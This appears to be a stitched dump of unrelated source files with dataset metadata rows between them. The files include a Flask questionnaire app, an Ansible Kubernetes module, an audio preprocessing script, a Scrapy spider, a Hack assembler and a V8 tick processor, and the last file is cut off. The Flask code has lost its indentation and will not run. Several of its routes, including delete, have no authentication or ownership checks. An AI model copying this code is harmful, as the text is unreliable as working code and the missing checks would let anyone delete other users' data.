from flask import render_template, jsonify, request
from . import main
import json,datetime
from flask_login import current_user, login_required
from ..models import Questionnaire, Item, Answer, Map, User
@main.route('/')
def index():
return render_template('index.html')
@main.route('/design', methods=['GET', 'POST'])
@login_required
def design():
if request.method == 'POST':
a = request.get_json(force = True)
title = a["title"]
if(current_user.is_administrator()):
tag = a["tag"]
timestamp = datetime.datetime.now()
user_id = current_user.get_id()
items = a["items"]
q = Questionnaire()
if(title != ""):
q.title = title
if(current_user.is_administrator()):
q.tag = tag
q.user_id = user_id
q.timestamp = timestamp
q.save()
for item in items:
i = Item()
question = item["question"]
no = item["no"]
kind = item["kind"]
need = item["need"]
i.question = question
i.no = no
i.kind = kind
i.need = need
choice = item["choice"]
for c in choice:
i.choice.append(c)
i.questionnaire = q
i.save()
return jsonify(result=str(q.id))
return render_template('design.html',id="")
@main.route('/old/p/<str>')
@login_required
def old(str):
user_id = current_user.get_id()
q = Questionnaire.objects(user_id=user_id).order_by("-timestamp").all()
return render_template('old.html',q=q, str=str)
@main.route('/old/edit/<id>')
def edit(id):
q = Questionnaire.objects(id=id).first()
i = Item.objects(questionnaire=id).order_by("+no").all()
return render_template('edit.html',q=q, i=i)
@main.route('/old/delete', methods=['GET', 'POST'])
def delete():
a = request.get_json(force = True)
id = a["id"]
q = Questionnaire.objects(id = id).first()
i = Item.objects(questionnaire=id).all()
a = Answer.objects(questionnaire = id).all()
q.delete()
for item in i:
item.delete()
for answer in a:
answer.delete()
return jsonify(a=1)
@main.route('/old/<id>')
def detail(id):
q = Questionnaire.objects(id=id).first()
i = Item.objects(questionnaire=id).order_by("+no").all()
count = 0
a = Answer.objects(questionnaire = q.id).count()
if(a):
count = a
a = Answer.objects(questionnaire = q.id).all()
answer_list = []
for answer in a:
answer_dict = {}
answer_dict['timestamp'] = answer.timestamp
answer_dict['content'] = []
for x in range(len(i)):
answer_item = {}
answer_item['question'] = i[x].question
answer_item['no'] = i[x].no
answer_item['kind'] = i[x].kind
answer_item['choice'] = []
for choice in i[x].choice:
tem = answer.map_list[x].v_choice
if(choice in tem):
choice_add=(choice,True)
else:
choice_add=(choice,False)
answer_item['choice'].append(choice_add)
answer_dict['content'].append(answer_item)
answer_list.append(answer_dict)
return render_template('detail.html',x=count, a=a, q=q, i=i, answer_list=answer_list)
@main.route('/chart')
def chart():
id = request.args.get('id')
q = Questionnaire.objects(id=id).first()
i = Item.objects(questionnaire=id).all()
L = []
for item in i:
d = {}
for choice in item.choice:
d[choice] = 0
for v in item.vote:
d[v]=d[v]+1
L.append(d)
return json.dumps(L)
@main.route('/create', methods=['GET', 'POST'])
def create():
a = request.get_json(force = True)
title = a["title"]
timestamp = datetime.datetime.now()
user_id = current_user.get_id()
items = a["items"]
q = Questionnaire()
if(title != ""):
q.title = title
q.user_id = user_id
q.timestamp = timestamp
q.save()
for item in items:
i = Item()
question = item["question"]
no = item["no"]
kind = item["kind"]
i.question = question
i.no = no
i.kind = kind
choice = item["choice"]
for c in choice:
i.choice.append(c)
i.questionnaire = q
i.save()
return jsonify(result=str(q.id))
@main.route('/example')
@login_required
def example():
u = User.query.all()
i = Item.objects().all()
for user in u:
if user.is_administrator():
id = str(user.id)
q = Questionnaire.objects(user_id=id).all()
return render_template('fromExample.html',q=q, i=i)
| 28.814371
| 89
| 0.554863
|
794dc8e0ac2faec7eabae56260b6fb42ff259ab0
| 87
|
py
|
Python
|
plugins/microsoft_atp/komand_microsoft_atp/actions/get_security_recommendations/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/microsoft_atp/komand_microsoft_atp/actions/get_security_recommendations/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/microsoft_atp/komand_microsoft_atp/actions/get_security_recommendations/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .action import GetSecurityRecommendations
| 29
| 46
| 0.816092
|
794dca0896f9e27bdd1c6e5d6b022448cdf74b5d
| 53
|
py
|
Python
|
good/expIntegers.py
|
Alberto42/Interpreter
|
a56c4d905672572734a8470ef607b66727489f15
|
[
"BSD-3-Clause"
] | null | null | null |
good/expIntegers.py
|
Alberto42/Interpreter
|
a56c4d905672572734a8470ef607b66727489f15
|
[
"BSD-3-Clause"
] | null | null | null |
good/expIntegers.py
|
Alberto42/Interpreter
|
a56c4d905672572734a8470ef607b66727489f15
|
[
"BSD-3-Clause"
] | null | null | null |
x = 1 + 2
y = 2 * 2
z = 5 - 3
v = 5 / 3
a = x + y + z
| 10.6
| 13
| 0.301887
|
794dcba2606c5ac6d956b74b840e581c64f592b4
| 4,742
|
py
|
Python
|
library/k8s_v1beta1_token_review.py
|
ansible/ansible-kubernetes-modules-
|
b5c7a85de6173c2f6141f19a130ff37b1fdafbf6
|
[
"Apache-2.0"
] | 91
|
2017-03-23T03:46:43.000Z
|
2021-06-03T18:30:03.000Z
|
library/k8s_v1beta1_token_review.py
|
ansible/ansible-kubernetes-modules-
|
b5c7a85de6173c2f6141f19a130ff37b1fdafbf6
|
[
"Apache-2.0"
] | 28
|
2017-06-02T18:21:13.000Z
|
2020-01-29T22:33:05.000Z
|
library/k8s_v1beta1_token_review.py
|
ansible/ansible-kubernetes-modules-
|
b5c7a85de6173c2f6141f19a130ff37b1fdafbf6
|
[
"Apache-2.0"
] | 40
|
2017-03-23T03:46:45.000Z
|
2022-02-01T14:29:21.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from ansible.module_utils.k8s_common import KubernetesAnsibleModule, KubernetesAnsibleException
DOCUMENTATION = '''
module: k8s_v1beta1_token_review
short_description: Kubernetes TokenReview
description:
- Manage the lifecycle of a token_review object. Supports check mode, and attempts
to to be idempotent.
version_added: 2.3.0
author: OpenShift (@openshift)
options:
annotations:
description:
- Annotations is an unstructured key value map stored with a resource that may
be set by external tools to store and retrieve arbitrary metadata. They are
not queryable and should be preserved when modifying objects.
type: dict
api_key:
description:
- Token used to connect to the API.
cert_file:
description:
- Path to a certificate used to authenticate with the API.
type: path
context:
description:
- The name of a context found in the Kubernetes config file.
debug:
description:
- Enable debug output from the OpenShift helper. Logging info is written to KubeObjHelper.log
default: false
type: bool
force:
description:
- If set to C(True), and I(state) is C(present), an existing object will updated,
and lists will be replaced, rather than merged.
default: false
type: bool
host:
description:
- Provide a URL for acessing the Kubernetes API.
key_file:
description:
- Path to a key file used to authenticate with the API.
type: path
kubeconfig:
description:
- Path to an existing Kubernetes config file. If not provided, and no other connection
options are provided, the openshift client will attempt to load the default
configuration file from I(~/.kube/config.json).
type: path
labels:
description:
- Map of string keys and values that can be used to organize and categorize (scope
and select) objects. May match selectors of replication controllers and services.
type: dict
name:
description:
- Name must be unique within a namespace. Is required when creating resources,
although some resources may allow a client to request the generation of an appropriate
name automatically. Name is primarily intended for creation idempotence and
configuration definition. Cannot be updated.
namespace:
description:
- Namespace defines the space within each name must be unique. An empty namespace
is equivalent to the "default" namespace, but "default" is the canonical representation.
Not all objects are required to be scoped to a namespace - the value of this
field for those objects will be empty. Must be a DNS_LABEL. Cannot be updated.
password:
description:
- Provide a password for connecting to the API. Use in conjunction with I(username).
spec_token:
description:
- Token is the opaque bearer token.
aliases:
- token
ssl_ca_cert:
description:
- Path to a CA certificate used to authenticate with the API.
type: path
username:
description:
- Provide a username for connecting to the API.
verify_ssl:
description:
- Whether or not to verify the API server's SSL certificates.
type: bool
requirements:
- kubernetes == 4.0.0
'''
EXAMPLES = '''
'''
RETURN = '''
api_version:
description: Requested API version
type: string
token_review:
type: complex
returned: on success
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation of an object.
Servers should convert recognized schemas to the latest internal value, and
may reject unrecognized values.
type: str
kind:
description:
- Kind is a string value representing the REST resource this object represents.
Servers may infer this from the endpoint the client submits requests to. Cannot
be updated. In CamelCase.
type: str
metadata:
description: []
type: complex
spec:
description:
- Spec holds information about the request being evaluated
type: complex
status:
description:
- Status is filled in by the server and indicates whether the request can be
authenticated.
type: complex
'''
def main():
try:
module = KubernetesAnsibleModule('token_review', 'v1beta1')
except KubernetesAnsibleException as exc:
# The helper failed to init, so there is no module object. All we can do is raise the error.
raise Exception(exc.message)
try:
module.execute_module()
except KubernetesAnsibleException as exc:
module.fail_json(msg="Module failed!", error=str(exc))
if __name__ == '__main__':
main()
| 32.040541
| 100
| 0.706031
|
794dcc0d5bad5987a8c5aace14fd42c9321e5a5b
| 37
|
py
|
Python
|
tests/commands/iot/__init__.py
|
epenet/aioguardian
|
2050c83ea746f831872f62569eecd85226112353
|
[
"MIT"
] | 1
|
2020-06-26T05:25:34.000Z
|
2020-06-26T05:25:34.000Z
|
tests/commands/iot/__init__.py
|
epenet/aioguardian
|
2050c83ea746f831872f62569eecd85226112353
|
[
"MIT"
] | 79
|
2020-04-15T00:35:44.000Z
|
2022-03-31T10:07:58.000Z
|
tests/commands/iot/__init__.py
|
epenet/aioguardian
|
2050c83ea746f831872f62569eecd85226112353
|
[
"MIT"
] | 6
|
2020-09-04T16:06:18.000Z
|
2022-03-30T18:42:37.000Z
|
"""Define tests for IOT commands."""
| 18.5
| 36
| 0.675676
|
794dcc36fb59afb3ea020bbbd423fde8116dedf6
| 9,327
|
py
|
Python
|
preprocess.py
|
c1a1o1/ByteSing-tf1.10
|
5ad0c76bd5bae8515108bd1811fcd589ac46300a
|
[
"MIT"
] | 2
|
2022-01-09T13:32:07.000Z
|
2022-02-01T06:33:39.000Z
|
preprocess.py
|
c1a1o1/ByteSing-tf1.10
|
5ad0c76bd5bae8515108bd1811fcd589ac46300a
|
[
"MIT"
] | null | null | null |
preprocess.py
|
c1a1o1/ByteSing-tf1.10
|
5ad0c76bd5bae8515108bd1811fcd589ac46300a
|
[
"MIT"
] | 1
|
2021-12-29T08:52:36.000Z
|
2021-12-29T08:52:36.000Z
|
# coding:utf-
import argparse
import os
from multiprocessing import cpu_count
import wave
from pydub import AudioSegment
import music21 as m21
from concurrent.futures import ProcessPoolExecutor
import numpy as np
from functools import partial
from tqdm import tqdm
from myData import pinyin
from datasets import audio
from hparams import hparams
def get_second_part_wave(wav, start_time, end_time, hparams):
start_time = int(start_time * 1000)
end_time = int(end_time * 1000)
sentence = wav[start_time: end_time]
temp = sentence.export('temp.wav', format="wav")
sentence = audio.load_wav('temp.wav', sr=hparams.sample_rate)
return sentence
def get_music_score(metadata_filename):
# 处理乐谱,输出每个音素[持续时长,midi,因素类型,音素]
lines = []
score = m21.converter.parse(metadata_filename)
part = score.parts.flat
for i in range(len(part.notesAndRests)):
event = part.notesAndRests[i]
if isinstance(event, m21.note.Note):
duration = event.seconds
midi = event.pitch.midi
if len(event.lyrics) > 0:
token = event.lyrics[1].text+'3'
token = pinyin.split_pinyin(token)
if token[0] != '':
lines.append([duration, midi, 0, token[0]])
lines.append([duration, midi, 1, token[1]])
elif token[1] != '':
lines.append([duration, midi, 2, token[1]])
else:
temp = lines[-1]
lines[-1][0] = lines[-1][0] + duration
elif isinstance(event, m21.note.Rest):
duration = event.seconds
midi = 0
token = 'sp'
if lines[-1][-1] != 'sp':
lines.append([duration, midi, 2, token])
else:
lines[-1][0] = lines[-1][0] + duration
return lines
def get_phoneme_duration(metadata_filename):
# 处理音频时长标注信息,返回[开始时间,结束时间,对应音素]
with open(metadata_filename, encoding='utf-8') as f:
i = 0
j = 0
durationOutput = []
for line in f:
if j != 15:
j = j+1
continue
line = line.split('\n')[0]
if i == 0:
startTime = float(line)
i = i+1
elif i == 1:
endTime = float(line)
i = i+1
else:
i = 0
temp = line.split('"')[1]
if temp == 'sil' or temp == 'pau':
temp = 'sp'
if j == 15:
durationOutput.append([startTime, endTime, temp])
else:
if durationOutput[-1][2] != temp:
durationOutput.append([startTime, endTime, temp])
else:
durationOutput[-1][1] = endTime
return durationOutput
def audio_process_utterance(mel_dir, linear_dir, wav_dir, duration_dir, score_dir, index, wav, durations, scores, hparams):
"""
Preprocesses a single utterance wav/text pair
this writes the mel scale spectogram to disk and return a tuple to write
to the train.txt file
Args:
- mel_dir: the directory to write the mel spectograms into
- linear_dir: the directory to write the linear spectrograms into
- wav_dir: the directory to write the preprocessed wav into
- index: the numeric index to use in the spectogram filename
- wav_path: path to the audio file containing the speech input
- hparams: hyper parameters
Returns:
- A tuple: (audio_filename, mel_filename, linear_filename, score_filename, duration_filename, time_steps, mel_frames)
"""
#rescale wav
if hparams.rescale:
wav = wav / np.abs(wav).max() * hparams.rescaling_max
#Get spectrogram from wav
ret = audio.wav2spectrograms(wav, hparams)
if ret is None:
return None
out = ret[0]
mel_spectrogram = ret[1]
linear_spectrogram = ret[2]
time_steps = ret[3]
mel_frames = ret[4]
# Write the spectrogram and audio to disk
audio_filename = 'audio-{}.npy'.format(index)
mel_filename = 'mel-{}.npy'.format(index)
linear_filename = 'linear-{}.npy'.format(index)
duration_filename = 'duration-{}.npy'.format(index)
score_filename = 'score-{}.npy'.format(index)
np.save(os.path.join(wav_dir, audio_filename), out.astype(np.float32), allow_pickle=False)
np.save(os.path.join(mel_dir, mel_filename), mel_spectrogram.T, allow_pickle=False)
np.save(os.path.join(linear_dir, linear_filename), linear_spectrogram.T, allow_pickle=False)
np.save(os.path.join(duration_dir, duration_filename), durations, allow_pickle=False)
np.save(os.path.join(score_dir, score_filename), scores, allow_pickle=False)
# Return a tuple describing this training example
return (audio_filename, mel_filename, linear_filename, duration_filename, score_filename, time_steps, mel_frames)
def build_from_path(hparams, input_dir, mel_dir, linear_dir, wav_dir, score_dir, duration_dir, n_jobs=12, tqdm=lambda x: x):
"""
Args:
- hparams: hyper parameters
- input_dir: input directory that contains the files to prerocess
- mel_dir: output directory of the preprocessed speech mel-spectrogram dataset
- linear_dir: output directory of the preprocessed speech linear-spectrogram dataset
- wav_dir: output directory of the preprocessed speech audio dataset
- n_jobs: Optional, number of worker process to parallelize across
- tqdm: Optional, provides a nice progress bar
Returns:
- A list of tuple describing the train examples. this should be written to train.txt
"""
# We use ProcessPoolExecutor to parallelize across processes, this is just for
# optimization purposes and it can be omited
executor = ProcessPoolExecutor(max_workers=n_jobs)
scores = get_music_score(os.path.join(input_dir, '001.musicxml'))
durations = get_phoneme_duration(os.path.join(input_dir, '001.interval'))
song = AudioSegment.from_wav(os.path.join(input_dir, '001.wav'))
futures = []
index = 1
sentence_duration = []
score_index = -1
for i in range(len(scores)):
sentence_duration.append(durations[i])
if durations[i][2] == 'sp':
sentence_score = []
wav = get_second_part_wave(song, sentence_duration[0][0], sentence_duration[-1][0], hparams)
while True:
score_index += 1
sentence_score.append(scores[score_index])
if scores[score_index][3] == 'sp':
futures.append(executor.submit(partial(audio_process_utterance, mel_dir, linear_dir, wav_dir,\
duration_dir, score_dir, index, wav, sentence_duration, sentence_score, hparams)))
# futures.append(audio_process_utterance(mel_dir, linear_dir, wav_dir,\
# duration_dir, score_dir, index, wav, sentence_duration, sentence_score, hparams))
index += 1
sentence_duration = []
break
return [future.result() for future in tqdm(futures) if future.result() is not None]
# return futures
def write_metadata(metadata, out_dir):
with open(os.path.join(out_dir, 'train.txt'), 'w', encoding='utf-8') as f:
for m in metadata:
f.write('|'.join([str(x) for x in m]) + '\n')
mel_frames = sum([int(m[6]) for m in metadata])
timesteps = sum([int(m[5]) for m in metadata])
sr = hparams.sample_rate
hours = timesteps / sr / 3600
print('Write {} utterances, {} mel frames, {} audio timesteps, ({:.2f} hours)'.format(
len(metadata), mel_frames, timesteps, hours))
print('Max mel frames length: {}'.format(max(int(m[6]) for m in metadata)))
print('Max audio timesteps length: {}'.format(max(m[5] for m in metadata)))
def main():
print('initializing preprocessing..')
parser = argparse.ArgumentParser()
parser.add_argument('--base_dir', default='/datapool/home/ywy19/singing-synthesis/ByteSing')
parser.add_argument('--hparams', default='',
help='Hyperparameter overrides as a comma-separated list of name=value pairs')
parser.add_argument('--dataset', default='myData')
parser.add_argument('--output', default='training_data')
parser.add_argument('--n_jobs', type=int, default=cpu_count())
args = parser.parse_args()
modified_hp = hparams.parse(args.hparams)
# Prepare directories
in_dir = os.path.join(args.base_dir, args.dataset)
out_dir = os.path.join(args.base_dir, args.output)
mel_dir = os.path.join(out_dir, 'mels')
wav_dir = os.path.join(out_dir, 'audio')
lin_dir = os.path.join(out_dir, 'linear')
dur_dir = os.path.join(out_dir, 'duration')
sco_dir = os.path.join(out_dir, 'score')
os.makedirs(mel_dir, exist_ok=True)
os.makedirs(wav_dir, exist_ok=True)
os.makedirs(lin_dir, exist_ok=True)
os.makedirs(dur_dir, exist_ok=True)
os.makedirs(sco_dir, exist_ok=True)
# Process dataset
metadata = []
metadata = build_from_path(modified_hp, in_dir, mel_dir, lin_dir, wav_dir, sco_dir, dur_dir, args.n_jobs, tqdm=tqdm)
# Write metadata to 'train.txt' for training
write_metadata(metadata, out_dir)
if __name__ == '__main__':
main()
| 40.202586
| 124
| 0.637397
|
794dcc9da123fd3026508cb55b125c9cb70768e0
| 3,117
|
py
|
Python
|
ganjoor/spiders/khaghani/divankh/scrapyghasidekh.py
|
amirmasoud/ganjoor-crawler
|
a86fe379955ce854765086ab7ba0a78513d052bd
|
[
"MIT"
] | null | null | null |
ganjoor/spiders/khaghani/divankh/scrapyghasidekh.py
|
amirmasoud/ganjoor-crawler
|
a86fe379955ce854765086ab7ba0a78513d052bd
|
[
"MIT"
] | null | null | null |
ganjoor/spiders/khaghani/divankh/scrapyghasidekh.py
|
amirmasoud/ganjoor-crawler
|
a86fe379955ce854765086ab7ba0a78513d052bd
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import scrapy
class scrapyghasidekhSpider(scrapy.Spider):
name = "scrapyghasidekh"
allowed_domains = ["ganjoor.net"]
if 224 == 1:
start_urls = ["https://ganjoor.net/khaghani/divankh/ghasidekh/sh"]
else:
start_urls = ["https://ganjoor.net/khaghani/divankh/ghasidekh/sh" + "1"]
order = 1
def parse(self, response):
index = 0
sh = dict()
sh["type"] = "ghaside"
sh["text"] = dict()
for i, poem in enumerate(response.css("div.poem>article>div")):
if poem.css("p:first-child::text").extract_first() is None:
continue
if index == 0:
if 3 == 1:
sh["title"] = "" + " شماره " + str(self.order) + " - " + ''.join(poem.css("div.m1>p::text").extract()).strip()
elif 3 == 2:
sh["title"] = "" + " شماره " + str(self.order) + " - " + ''.join(poem.css("div.m2>p::text").extract()).strip()
elif 3 == 3:
sh["title"] = "" + " شماره " + str(self.order) + " - " + ''.join(response.css("div.poem>article>h2>a::text").extract()).strip() + ': ' + ''.join(poem.css("div.m1>p::text").extract()).strip()
elif 3 == 4:
sh["title"] = "" + " شماره " + str(self.order) + " - " + ''.join(response.css("div.poem>article>h2>a::text").extract()).strip() + ': ' + ''.join(poem.css("div.m2>p::text").extract()).strip()
else:
sh["title"] = response.css("div.poem>article>h2>a::text").extract_first()
if len(poem.css("div.m1>p")) == 1:
if poem.css("div.b"):
sh["text"][index] = dict([
("m1", ''.join(poem.css("div.m1>p::text").extract()).strip()),
("m2", ''.join(poem.css("div.m2>p::text").extract()).strip()),
])
else:
sh["text"][index] = dict([
("t1", ''.join(poem.css("p:first-child::text").extract()).strip()),
("t2", ''.join(poem.css("p:last-child::text").extract()).strip()),
])
else:
if poem.css("div.b2"):
sh["text"][index] = dict([
("t1", ''.join(poem.css("p:first-child::text").extract()).strip()),
("t2", ''.join(poem.css("p:last-child::text").extract()).strip()),
])
else:
sh['text'][index] = dict([
('p', ''.join(poem.css('p:first-child::text').extract()).strip())
])
index = index + 1
sh["order"] = self.order
self.order = self.order + 1
yield sh
# next_page = response.css("div.navigation>div.navleft>a::attr(href)").extract_first()
if self.order < (224 + 1):
next_page = response.urljoin("https://ganjoor.net/khaghani/divankh/ghasidekh/sh" + str(self.order))
yield scrapy.Request(next_page, callback=self.parse)
| 51.098361
| 210
| 0.45717
|
794dcd9fe4c4a500ad2bd233a27fda8949c6373a
| 887
|
py
|
Python
|
socketshark/constants.py
|
Play2Live/socketshark
|
9b1e40654bf629c593079fb44c548911d4c864af
|
[
"MIT"
] | 70
|
2017-06-15T01:30:56.000Z
|
2022-03-18T19:35:26.000Z
|
socketshark/constants.py
|
Play2Live/socketshark
|
9b1e40654bf629c593079fb44c548911d4c864af
|
[
"MIT"
] | 40
|
2017-08-03T20:54:43.000Z
|
2021-12-06T10:43:53.000Z
|
socketshark/constants.py
|
Play2Live/socketshark
|
9b1e40654bf629c593079fb44c548911d4c864af
|
[
"MIT"
] | 7
|
2018-10-03T10:00:10.000Z
|
2021-11-05T07:14:33.000Z
|
# Authentication method to use if "method" param is omitted.
DEFAULT_AUTH_METHOD = 'ticket'
# Max string length of the "event" parameter.
MAX_EVENT_LENGTH = 40
# General event errors
ERR_INVALID_EVENT = 'Messages must be JSON and contain an event field.'
ERR_UNHANDLED_EXCEPTION = 'Unhandled exception.'
ERR_EVENT_NOT_FOUND = 'Event not found.'
ERR_SERVICE_UNAVAILABLE = 'Service unavailable.'
# Authentication & authorization
ERR_AUTH_UNSUPPORTED = 'Authentication method unsupported.'
ERR_UNAUTHORIZED = 'Unauthorized.'
ERR_NEEDS_TICKET = 'Must specify ticket.'
ERR_AUTH_FAILED = 'Authentication failed.'
ERR_AUTH_REQUIRED = 'Authentication required.'
# Subscriptions
ERR_INVALID_SUBSCRIPTION_FORMAT = 'Invalid subscription format.'
ERR_INVALID_SERVICE = 'Invalid service.'
ERR_ALREADY_SUBSCRIBED = 'Already subscribed.'
ERR_SUBSCRIPTION_NOT_FOUND = 'Subscription does not exist.'
| 35.48
| 71
| 0.808343
|
794dcdf5698e7a57b8c61f87d36df8e54a5be188
| 2,968
|
py
|
Python
|
06/Python/assembler.py
|
MrEbbinghaus/nand2tetris
|
1d01969761dbca674b5b31238253ce56b632bfe9
|
[
"MIT"
] | null | null | null |
06/Python/assembler.py
|
MrEbbinghaus/nand2tetris
|
1d01969761dbca674b5b31238253ce56b632bfe9
|
[
"MIT"
] | null | null | null |
06/Python/assembler.py
|
MrEbbinghaus/nand2tetris
|
1d01969761dbca674b5b31238253ce56b632bfe9
|
[
"MIT"
] | null | null | null |
#python3
from sys import argv
from os import path
from re import sub
memoryCounter = 16
symbolTable = {
"SCREEN":int("4000",16),
"SP":0,
"LCL":1,
"ARG":2,
"THIS":3,
"THAT":4,
"KBD":int("6000",16),
}
jmpTable = {
"null":"000",
"JGT":"001",
"JEQ":"010",
"JGE":"011",
"JLT":"100",
"JNE":"101",
"JLE":"110",
"JMP":"111"
}
cmdTable = {
"0":"101010",
"1":"111111",
"-1":"111010",
"D":"001100",
"A":"110000",
"!D":"001101",
"!A":"110001",
"-D":"001111",
"-A":"110011",
"D+1":"011111",
"A+1":"110111",
"D-1":"001110",
"A-1":"110010",
"D+A":"000010",
"D-A":"010011",
"A-D":"000111",
"D&A":"000000",
"D|A":"010101"
}
def buildDict(lines):
for x in range(0,16):
symbolTable["R"+str(x)] = x
lineCounter = 0
for line in lines:
if line[0] == '(' :
line = line.strip('()')
if line not in symbolTable:
symbolTable[line] = lineCounter
else:
lineCounter += 1
def IToXbitBin(y, bit):
ret = bin( int(y) )[2:]
x = bit - len(ret)
while x > 0 :
ret = '0' + ret
x -= 1
return ret
def parseA(line):
ret = "0"
if line[1].isdigit():
ret += IToXbitBin(line[1:], 15)
else:
if line[1:] in symbolTable.keys():
value = symbolTable[line[1:]]
ret += IToXbitBin(value, 15)
else:
global memoryCounter
while( memoryCounter in symbolTable.values() and memoryCounter < int("4000",16) ):
memoryCounter += 1
symbolTable[ line[1:] ] = memoryCounter
ret += IToXbitBin(memoryCounter,15)
return ret + '\n'
def parseDest(i):
dest = ""
if 'A' in i:
dest += '1'
else:
dest += '0'
if 'D' in i:
dest += '1'
else:
dest += '0'
if 'M' in i:
dest += '1'
else:
dest += '0'
return dest
def parseC(line):
ret = "111"
dest = "000"
jmp = "000"
a = "0"
if ';' in line:
sp_line = line.split(';')
jmp = jmpTable[sp_line[1]]
line = sp_line[0]
if '=' in line:
sp_line = line.split('=')
dest = parseDest( sp_line[0] )
if 'M' in sp_line[1]:
a = "1"
cmd_line = sp_line[1].replace("M","A")
cmd = cmdTable[ cmd_line ]
else:
cmd = cmdTable[ line ]
return ret + a + cmd + dest + jmp + '\n'
def parse(line):
if line[0] == '@':
return parseA(line)
else:
return parseC(line)
# start!
if len(argv) > 1:
in_file = argv[1]
output_name = path.splitext(in_file)[0] + ".hack"
if len(argv) > 2:
output_name = argv[2]
else:
print( "Input format wrong!\n"+
"Correct input format (output optional): \n"+
"python3 assembler.py input (output)")
exit(1)
file_input = open (in_file, "r")
lines = file_input.readlines()
lines = map (lambda line: sub(r"//.*","", line), lines) #clear comments
lines = list ( filter(None, map(str.strip, lines) ) ) #clear whitespace & empty lines
file_input.close()
buildDict(lines)
lines = filter(lambda line: not(line.startswith("(")), lines) #clear lables
out_lines = list( map(parse, lines) )
file_output = open( output_name, "w")
file_output.writelines( out_lines )
file_output.close()
print ( "Done!" )
| 16.218579
| 85
| 0.583895
|
794dceadb1e9891584adab104b35a53490cb3374
| 3,055
|
py
|
Python
|
tools/linux-tick-processor.py
|
martine/v8c
|
222c7cd957ea7be31701172e8f66e4c31d0aa3f4
|
[
"BSD-3-Clause-Clear"
] | 3
|
2015-01-01T16:04:49.000Z
|
2016-05-08T13:54:15.000Z
|
tools/linux-tick-processor.py
|
martine/v8c
|
222c7cd957ea7be31701172e8f66e4c31d0aa3f4
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
tools/linux-tick-processor.py
|
martine/v8c
|
222c7cd957ea7be31701172e8f66e4c31d0aa3f4
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Usage: process-ticks.py <logfile>
# Where <logfile> is the log file name (eg, v8.log).
import os, re, sys, tickprocessor, getopt;
class LinuxTickProcessor(tickprocessor.TickProcessor):
def ParseVMSymbols(self, filename, start, end):
"""Extract symbols and add them to the cpp entries."""
pipe = os.popen('nm -n %s | c++filt' % filename, 'r')
try:
for line in pipe:
row = re.match('^([0-9a-fA-F]{8}) . (.*)$', line)
if row:
addr = int(row.group(1), 16)
if addr < start and addr < end - start:
addr += start
self.cpp_entries.Insert(addr, tickprocessor.CodeEntry(addr, row.group(2)))
finally:
pipe.close()
def Usage():
print("Usage: linux-tick-processor.py --{js,gc,compiler,other} logfile-name");
sys.exit(2)
def Main():
# parse command line options
state = None;
try:
opts, args = getopt.getopt(sys.argv[1:], "jgco", ["js", "gc", "compiler", "other"])
except getopt.GetoptError:
usage()
# process options.
for key, value in opts:
if key in ("-j", "--js"):
state = 0
if key in ("-g", "--gc"):
state = 1
if key in ("-c", "--compiler"):
state = 2
if key in ("-o", "--other"):
state = 3
# do the processing.
if len(args) != 1:
Usage();
tick_processor = LinuxTickProcessor()
tick_processor.ProcessLogfile(args[0], state)
tick_processor.PrintResults()
if __name__ == '__main__':
Main()
| 37.256098
| 87
| 0.68216
|
794dcf8e928665c70c1d925de63b7567b8085bb2
| 787
|
py
|
Python
|
nxxcgram/notifications/views.py
|
nxxc/nxxcgram
|
bad344d92f75ee46bfadf3b5dacbe99668c9e9ca
|
[
"MIT"
] | null | null | null |
nxxcgram/notifications/views.py
|
nxxc/nxxcgram
|
bad344d92f75ee46bfadf3b5dacbe99668c9e9ca
|
[
"MIT"
] | 8
|
2020-06-05T19:40:44.000Z
|
2022-02-26T13:25:34.000Z
|
nxxcgram/notifications/views.py
|
nxxc/nxxcgram
|
bad344d92f75ee46bfadf3b5dacbe99668c9e9ca
|
[
"MIT"
] | null | null | null |
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework import status
from . import models, serializers
class Notifications(APIView):
def get(self, request, format=None):
user = request.user
notifications = models.Notification.objects.filter(to=user)
serializer = serializers.NotificationSerializer(notifications, many=True)
